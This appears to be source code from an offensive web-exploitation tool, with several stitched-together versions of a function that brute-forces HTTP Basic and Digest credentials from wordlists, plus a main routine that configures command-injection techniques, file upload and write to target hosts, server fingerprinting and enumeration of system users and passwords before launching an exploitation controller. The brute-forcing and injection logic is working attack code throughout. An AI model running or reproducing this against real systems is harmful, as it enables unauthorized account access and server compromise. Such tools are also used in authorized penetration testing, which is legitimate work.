def http_auth_cracker(url, realm): # Define the HTTP authentication type. authentication_type = menu.options.auth_type # Define the authentication wordlists for usernames / passwords. usernames, passwords = define_wordlists() i = 1 found = False total = len(usernames) * len(passwords) for username in usernames: for password in passwords: float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2)) try: # Basic authentication if authentication_type.lower() == "basic": request = urllib2.Request(url) base64string = base64.encodestring(username + ":" + password)[:-1] request.add_header("Authorization", "Basic " + base64string) result = urllib2.urlopen(request) # Digest authentication elif authentication_type.lower() == "digest": authhandler = urllib2.HTTPDigestAuthHandler() authhandler.add_password(realm, url, username, password) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) result = urllib2.urlopen(url) # Store valid results to session admin_panel = url session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password) found = True except KeyboardInterrupt : raise except: pass if found: float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: if str(float_percent) == "100.0%": float_percent = Fore.RED + "FAILED" + Style.RESET_ALL else: i = i + 1 sys.stdout.write("\r\r" + settings.INFO_SIGN + "Checking for a valid pair of credentials... [ " + float_percent + " ]") sys.stdout.flush() if found: valid_pair = "" + username + ":" + password + "" print Style.BRIGHT + "\n(!) Identified a valid pair of credentials '" + Style.UNDERLINE + valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." + Style.RESET_ALL return valid_pair error_msg = "Use the '--auth-cred' option to provide a valid pair of " error_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " error_msg += "or place an other dictionary into '" + os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." print "\n" + Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL return False #eof
def http_auth_cracker(url, realm): # Define the HTTP authentication type. authentication_type = menu.options.auth_type # Define the authentication wordlists for usernames / passwords. usernames, passwords = define_wordlists() i = 1 found = False total = len(usernames) * len(passwords) for username in usernames: for password in passwords: float_percent = "{0:.1f}%".format( round(((i * 100) / (total * 1.0)), 2)) # Check if verbose mode on if settings.VERBOSITY_LEVEL >= 1: payload = "pair of credentials '" + username + ":" + password + "'" sys.stdout.write("\r" + settings.print_checking_msg(payload) + " ") sys.stdout.flush() try: # Basic authentication if authentication_type.lower() == "basic": request = urllib2.Request(url) base64string = base64.encodestring(username + ":" + password)[:-1] request.add_header("Authorization", "Basic " + base64string) result = urllib2.urlopen(request) # Digest authentication elif authentication_type.lower() == "digest": authhandler = urllib2.HTTPDigestAuthHandler() authhandler.add_password(realm, url, username, password) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) result = urllib2.urlopen(url) # Store valid results to session admin_panel = url session_handler.import_valid_credentials( url, authentication_type, admin_panel, username, password) found = True except KeyboardInterrupt: raise except: pass if found: if not settings.VERBOSITY_LEVEL >= 1: float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: if str(float_percent) == "100.0%": if not settings.VERBOSITY_LEVEL >= 1: float_percent = Fore.RED + "FAILED" + Style.RESET_ALL else: i = i + 1 if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Checking for a valid pair of credentials... [ " + float_percent + " ]" sys.stdout.write("\r\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if found: valid_pair = "" + username + ":" + password + "" print "" success_msg = "Identified a valid pair of credentials '" success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." print settings.print_success_msg(success_msg) return valid_pair err_msg = "Use the '--auth-cred' option to provide a valid pair of " err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " err_msg += "or place an other dictionary into '" err_msg += os.path.abspath( os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." print "\n" + settings.print_critical_msg(err_msg) return False #eof
def http_auth_cracker(url, realm): settings.PERFORM_CRACKING = True # Define the HTTP authentication type. authentication_type = menu.options.auth_type # Define the authentication wordlists for usernames / passwords. usernames, passwords = define_wordlists() i = 1 found = False total = len(usernames) * len(passwords) for username in usernames: for password in passwords: float_percent = "{0:.1f}%".format( round(((i * 100) / (total * 1.0)), 2)) # Check if verbose mode on if settings.VERBOSITY_LEVEL != 0: payload = "" + username + ":" + password + "" if settings.VERBOSITY_LEVEL >= 2: print(settings.print_checking_msg(payload)) else: sys.stdout.write("\r" + settings.print_checking_msg(payload) + " " * 10) sys.stdout.flush() try: # Basic authentication if authentication_type.lower() == "basic": authhandler = _urllib.request.HTTPBasicAuthHandler() # Digest authentication elif authentication_type.lower() == "digest": authhandler = _urllib.request.HTTPDigestAuthHandler() authhandler.add_password(realm, url, username, password) opener = _urllib.request.build_opener(authhandler) _urllib.request.install_opener(opener) request = _urllib.request.Request(url) headers.do_check(request) headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: tor.use_tor(request) response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT) # Store valid results to session admin_panel = url session_handler.import_valid_credentials( url, authentication_type, admin_panel, username, password) found = True except KeyboardInterrupt: raise except (_urllib.error.HTTPError, _urllib.error.URLError): pass if found: if settings.VERBOSITY_LEVEL == 0: float_percent = settings.info_msg else: if str(float_percent) == "100.0%": if settings.VERBOSITY_LEVEL == 0: float_percent = settings.FAIL_STATUS else: i = i + 1 float_percent = ".. (" + float_percent + ")" if settings.VERBOSITY_LEVEL == 0: info_msg = "Checking for a valid pair of credentials." info_msg += float_percent sys.stdout.write("\r\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if found: valid_pair = "" + username + ":" + password + "" if not settings.VERBOSITY_LEVEL >= 2: print(settings.SINGLE_WHITESPACE) info_msg = "Identified a valid pair of credentials '" info_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." print(settings.print_bold_info_msg(info_msg)) return valid_pair err_msg = "Use the '--auth-cred' option to provide a valid pair of " err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " err_msg += "or place an other dictionary into '" err_msg += os.path.abspath( os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." print("\n" + settings.print_critical_msg(err_msg)) return False # eof
def http_basic(url): authentication_type = "basic" try: usernames = [] if not os.path.isfile(settings.USERNAMES_TXT_FILE): print Back.RED + settings.ERROR_SIGN + "The username file (" + settings.USERNAMES_TXT_FILE + ") is not found" + Style.RESET_ALL sys.exit(0) if len(settings.USERNAMES_TXT_FILE) == 0: print Back.RED + settings.ERROR_SIGN + "The " + settings.USERNAMES_TXT_FILE + " file is empty." sys.exit(0) with open(settings.USERNAMES_TXT_FILE, "r") as f: for line in f: line = line.strip() usernames.append(line) except IOError: print Back.RED + settings.ERROR_SIGN + " Check if the " + settings.USERNAMES_TXT_FILE + " file is readable or corrupted." sys.exit(0) try: passwords = [] if not os.path.isfile(settings.PASSWORDS_TXT_FILE): print Back.RED + settings.ERROR_SIGN + "The password file (" + settings.PASSWORDS_TXT_FILE + ") is not found" + Style.RESET_ALL sys.exit(0) if len(settings.PASSWORDS_TXT_FILE) == 0: print Back.RED + settings.ERROR_SIGN + "The " + settings.PASSWORDS_TXT_FILE + " file is empty." exit() with open(settings.PASSWORDS_TXT_FILE, "r") as f: for line in f: line = line.strip() passwords.append(line) except IOError: print Back.RED + settings.ERROR_SIGN + " Check if the " + settings.PASSWORDS_TXT_FILE + " file is readable or corrupted." sys.exit(0) i = 1 found = False total = len(usernames) * len(passwords) for username in usernames: for password in passwords: float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2)) try: request = urllib2.Request(url) base64string = base64.encodestring(username + ":" + password)[:-1] request.add_header("Authorization", "Basic " + base64string) result = urllib2.urlopen(request) # Store results to session admin_panel = url session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password) found = True except KeyboardInterrupt : raise except: pass if found: float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: if str(float_percent) == "100.0%": float_percent = Fore.RED + "FAILED" + Style.RESET_ALL else: i = i + 1 sys.stdout.write("\r\r" + settings.INFO_SIGN + "Checking for a valid pair of credentials... [ " + float_percent + " ]") sys.stdout.flush() if found: valid_pair = "" + username + ":" + password + "" print Style.BRIGHT + "\n(!) Identified a valid pair of credentials '" + Style.UNDERLINE + valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." + Style.RESET_ALL return valid_pair error_msg = "Use the '--auth-cred' option to provide a valid pair of " error_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " error_msg += "or place an other dictionary into '" + os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." print "\n" + Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL return False #eof
def main(filename, url): try: # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True if menu.options.enable_backticks: settings.USE_BACKTICKS = True # Target URL reload. if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True if menu.options.header is not None and settings.INJECT_TAG in menu.options.header or \ menu.options.headers is not None and settings.INJECT_TAG in menu.options.headers: info_msg = "Injection marker found in option '--header(s)/--user-agent/--referer/--cookie'." print(settings.print_info_msg(info_msg)) if menu.options.test_parameter: err_msg = "The options '-p' and the injection marker cannot be used " err_msg += "simultaneously (i.e. only one option must be set)." print(settings.print_critical_msg(err_msg)) raise SystemExit if menu.options.test_parameter and menu.options.skip_parameter: if type(menu.options.test_parameter) is bool: menu.options.test_parameter = None else: err_msg = "The options '-p' and '--skip' cannot be used " err_msg += "simultaneously (i.e. only one option must be set)." print(settings.print_critical_msg(err_msg)) raise SystemExit if menu.options.ignore_session: # Ignore session session_handler.ignore(url) # Check provided parameters for tests if menu.options.test_parameter or menu.options.skip_parameter: if menu.options.test_parameter != None: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[ 1:] settings.TEST_PARAMETER = menu.options.test_parameter.split( settings.PARAMETER_SPLITTING_REGEX) elif menu.options.skip_parameter != None: if menu.options.skip_parameter.startswith("="): menu.options.skip_parameter = menu.options.skip_parameter[ 1:] settings.TEST_PARAMETER = menu.options.skip_parameter.split( settings.PARAMETER_SPLITTING_REGEX) for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check injection level, due to the provided testable parameters. if menu.options.level < 2 and menu.options.test_parameter != None: checks.check_injection_level() # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check for skipping injection techniques. if menu.options.skip_tech: settings.SKIP_TECHNIQUES = True menu.options.tech = menu.options.skip_tech # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split( settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] err_msg += "' as injection technique. " err_msg += "The value for '" if not settings.SKIP_TECHNIQUES: err_msg += "--technique" else: err_msg += "--skip-technique" err_msg += "' must be a string composed by the letters C, E, T, F. " err_msg += "Refer to the official wiki for details." print(settings.print_critical_msg(err_msg)) raise SystemExit() if not menu.options.tech: menu.options.tech = "" # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print(settings.print_critical_msg(err_msg)) raise SystemExit() # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (i.e. '--file-dest')." print(settings.print_critical_msg(err_msg)) raise SystemExit() if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print(settings.print_critical_msg(err_msg)) raise SystemExit() # Check if defined "--url" or "-m" option. if url: if menu.options.auth_cred and menu.options.auth_type: info_msg = "Used a valid pair of " + menu.options.auth_type info_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'." print(settings.print_bold_info_msg(info_msg)) session_handler.import_valid_credentials(url, authentication_type=menu.options.auth_type, \ admin_panel=url, username=menu.options.auth_cred.split(":")[0], \ password=menu.options.auth_cred.split(":")[1] ) # Load the crawler if menu.options.crawldepth > 0 or menu.options.sitemap_url: url = crawler.crawler(url) try: if menu.options.flush_session: session_handler.flush(url) # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: if not settings.USE_BACKTICKS: settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: checks.file_upload() try: _urllib.request.urlopen(menu.options.file_upload, timeout=settings.TIMEOUT) except _urllib.error.HTTPError as err_msg: print(settings.print_critical_msg(str(err_msg.code))) raise SystemExit() except _urllib.error.URLError as err_msg: print( settings.print_critical_msg( str(err_msg.args[0]).split("] ")[1] + ".")) raise SystemExit() try: # Webpage encoding detection. requests.encoding_detection(response) # Procedure for target application identification requests.application_identification(url) # Specifies the technology supporting the web application requests.technology_detection(response) if response.info()['server']: server_banner = response.info()['server'] # Procedure for target server's operating system identification. requests.check_target_os(server_banner) # Procedure for target server identification. requests.server_identification(server_banner) # Store the Server's root dir settings.DEFAULT_WEB_ROOT = settings.WEB_ROOT if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Define Python working directory. checks.define_py_working_dir() # Check for wrong flags. checks.check_wrong_flags() else: found_os_server = checks.user_defined_os() except KeyError: pass except AttributeError: pass # Load tamper scripts if menu.options.tamper: checks.tamper_scripts() except _urllib.error.HTTPError as err_msg: # Check the codes of responses if str(err_msg.getcode()) == settings.INTERNAL_SERVER_ERROR: print(settings.SPACE) content = err_msg.read() raise SystemExit() # Invalid permission to access target URL page. elif str(err_msg.getcode()) == settings.FORBIDDEN_ERROR: if settings.VERBOSITY_LEVEL < 2: print(settings.SPACE) err_msg = "You don't have permission to access this page." print(settings.print_critical_msg(err_msg)) raise SystemExit() # The target host seems to be down! elif str(err_msg.getcode()) == settings.NOT_FOUND_ERROR: if settings.VERBOSITY_LEVEL < 2: print(settings.SPACE) err_msg = "Not found." print(settings.print_critical_msg(err_msg)) raise SystemExit() else: raise # The target host seems to be down! except (_urllib.error.URLError, _http_client.BadStatusLine) as e: if settings.VERBOSITY_LEVEL < 2: print(settings.SPACE) err_msg = "The host seems to be down" try: err_msg += " (" + str(e.args[0]).split("] ")[1] + ")." except IndexError: err_msg += "." pass print(settings.print_critical_msg(err_msg)) raise SystemExit() except _http_client.InvalidURL as err_msg: print(settings.print_critical_msg(err_msg)) raise SystemExit() except AttributeError: pass else: err_msg = "You must specify the target URL." print(settings.print_critical_msg(err_msg)) raise SystemExit() # Retrieve everything from the supported enumeration options. if menu.options.enum_all: checks.enable_all_enumeration_options() # Launch injection and exploitation controller. controller.do_check(url, filename) return filename # Accidental stop / restart of the target host server. except (_http_client.BadStatusLine, SocketError) as err_msg: if settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print("\n" + settings.print_critical_msg(err_msg)) logs.print_logs_notification(filename, url)